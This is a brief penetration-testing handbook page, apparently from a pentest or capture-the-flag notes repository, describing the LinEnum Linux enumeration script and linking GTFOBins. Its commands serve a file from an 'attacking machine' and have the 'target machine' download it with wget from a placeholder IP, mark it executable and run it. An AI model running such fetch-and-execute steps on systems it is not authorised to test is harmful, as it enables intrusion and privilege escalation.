handbook/tools/5.Machine/1.Linux/General/Tools/LinEnum.md
2024-08-31 01:07:22 +02:00

985 B

General

LinEnum is a bash script designed to automate the process of searching for known vulnerabilities and misconfigurations on a Linux system. It can be used as a standalone tool or as part of a larger process to assess the security of a system. LinEnum performs a number of checks, including:

  • Enumerating the kernel and system information
  • Searching for files with potentially dangerous permissions
  • Checking for any installed software that is known to have vulnerabilities
  • Checking for misconfigurations that may allow an attacker to gain unauthorized access

Commands

# Attacking Machine
python3 -m http.server

# Target Machine
wget http://IP/Name.sh
chmod +x NAME.sh
./NAME.sh

'---> GTFOBins Might be useful from the results https://gtfobins.github.io/

LinEnum

All Information ---> https://github.com/rebootuser/LinEnum